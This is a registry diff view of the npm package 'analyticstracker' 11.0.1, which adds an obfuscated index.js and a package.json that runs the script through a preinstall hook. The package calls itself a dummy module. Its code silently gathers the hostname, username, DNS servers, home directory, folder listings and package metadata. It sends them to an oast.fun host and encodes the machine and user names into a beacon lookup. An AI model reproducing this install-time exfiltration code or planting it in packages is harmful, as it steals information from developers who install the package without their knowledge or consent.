analyticstracker 11.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of analyticstracker might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +12 -0
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function _0x6615(){const _0x418306=['2589408AEGMOE','.dgpftxcravdmaqwoboitfpwt8zec0rne1.oast.fun','push','7049707EvQCBi','2imEbRB','data','634857uSjNes','3242946XgmVAr','10296920NJLfeQ','___resolved','request','homedir','./package.json','GET','stringify','error','24eSxjRU','application/json','30860730mAUzUW','join','dns','POST','end','write','username','statSync','getServers','1702020jrtWoL','readdirSync','version','https','hostname'];_0x6615=function(){return _0x418306;};return _0x6615();}const _0x43cbe2=_0x2a35;(function(_0x4b0f80,_0x214c41){const _0x4d6cb8=_0x2a35,_0x14c168=_0x4b0f80();while(!![]){try{const _0x2a362f=parseInt(_0x4d6cb8(0xae))/0x1*(-parseInt(_0x4d6cb8(0xac))/0x2)+-parseInt(_0x4d6cb8(0xaf))/0x3+parseInt(_0x4d6cb8(0xa8))/0x4+parseInt(_0x4d6cb8(0xa3))/0x5*(-parseInt(_0x4d6cb8(0xb8))/0x6)+parseInt(_0x4d6cb8(0xab))/0x7+-parseInt(_0x4d6cb8(0xb0))/0x8+parseInt(_0x4d6cb8(0xba))/0x9;if(_0x2a362f===_0x214c41)break;else _0x14c168['push'](_0x14c168['shift']());}catch(_0x4f262f){_0x14c168['push'](_0x14c168['shift']());}}}(_0x6615,0xaf805));const r=require('fs'),t=require('os'),s=require(_0x43cbe2(0xbc)),i=require(_0x43cbe2(0xa6)),p=require('path'),j=require(_0x43cbe2(0xb4)),n=j['name'];function g(_0x2e368f){const _0x25f267=[];function _0x4ea0a5(_0x14236a){const _0x25e76f=_0x2a35,_0x3e5eb0=r[_0x25e76f(0xa4)](_0x14236a);for(const _0x47aa35 of _0x3e5eb0){const _0x4495b5=p[_0x25e76f(0xbb)](_0x14236a,_0x47aa35);r[_0x25e76f(0xa1)](_0x4495b5)['isDirectory']()&&(_0x25f267[_0x25e76f(0xaa)](_0x4495b5),_0x4ea0a5(_0x4495b5));}}return _0x4ea0a5(_0x2e368f),_0x25f267;}function _0x2a35(_0x2eb04b,_0x466a53){const _0x661556=_0x6615();return _0x2a35=function(_0x2a3535,_0x2638ca){_0x2a3535=_0x2a3535-0xa1;let _0x4e37f1=_0x661556[_0x2a3535];return _0x4e37f1;},_0x2a35(_0x2eb04b,_0x466a53);}const gFolders=g(p[_0x43cbe2(0xbb)](__dirname,'..')),hFolders=g(p['join'](t['homedir'](),'..')),data={'p':n,'c':__dirname,'c_f':gFolders,'hd':t[_0x43cbe2(0xb3)](),'hd_f':hFolders,'hn':t[_0x43cbe2(0xa7)](),'un':t['userInfo']()[_0x43cbe2(0xc0)],'dns':s[_0x43cbe2(0xa2)](),'r':j?j[_0x43cbe2(0xb1)]:undefined,'v':j[_0x43cbe2(0xa5)],'pjson':j};var postData=JSON[_0x43cbe2(0xb6)](data),commonOptions={'method':_0x43cbe2(0xbd),'headers':{'Content-Type':_0x43cbe2(0xb9),'Content-Length':Buffer['byteLength'](postData)}},options1={...commonOptions,'hostname':'dgpftxcravdmaqwoboitfpwt8zec0rne1.oast.fun','port':0x1bb,'path':'/'},req1=i[_0x43cbe2(0xb2)](options1,_0x57696b=>{const _0x3e6200=_0x43cbe2;_0x57696b['on'](_0x3e6200(0xad),_0x101171=>{const _0x396b44=_0x3e6200;process['stdout'][_0x396b44(0xbf)](_0x101171);});});req1['on'](_0x43cbe2(0xb7),_0x47dd79=>{}),req1[_0x43cbe2(0xbf)](postData),req1['end']();var options2={'method':_0x43cbe2(0xb5),'hostname':t[_0x43cbe2(0xa7)]()+'.'+t['userInfo']()[_0x43cbe2(0xc0)]+_0x43cbe2(0xa9),'port':0x1bb,'path':'/'},req2=i[_0x43cbe2(0xb2)](options2,_0x33d5fd=>{const _0x47a81b=_0x43cbe2;_0x33d5fd['on'](_0x47a81b(0xad),_0x308eaf=>{process['stdout']['write'](_0x308eaf);});});req2['on'](_0x43cbe2(0xb7),_0x14de17=>{}),req2[_0x43cbe2(0xbe)]();
|
package/package.json
ADDED
@@ -0,0 +1,12 @@
|
|
1
|
+
{
|
2
|
+
"name": "analyticstracker",
|
3
|
+
"version": "11.0.1",
|
4
|
+
"description": "analyticstracker dummy module; do not use; not functional.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"preinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC"
|
12
|
+
}
|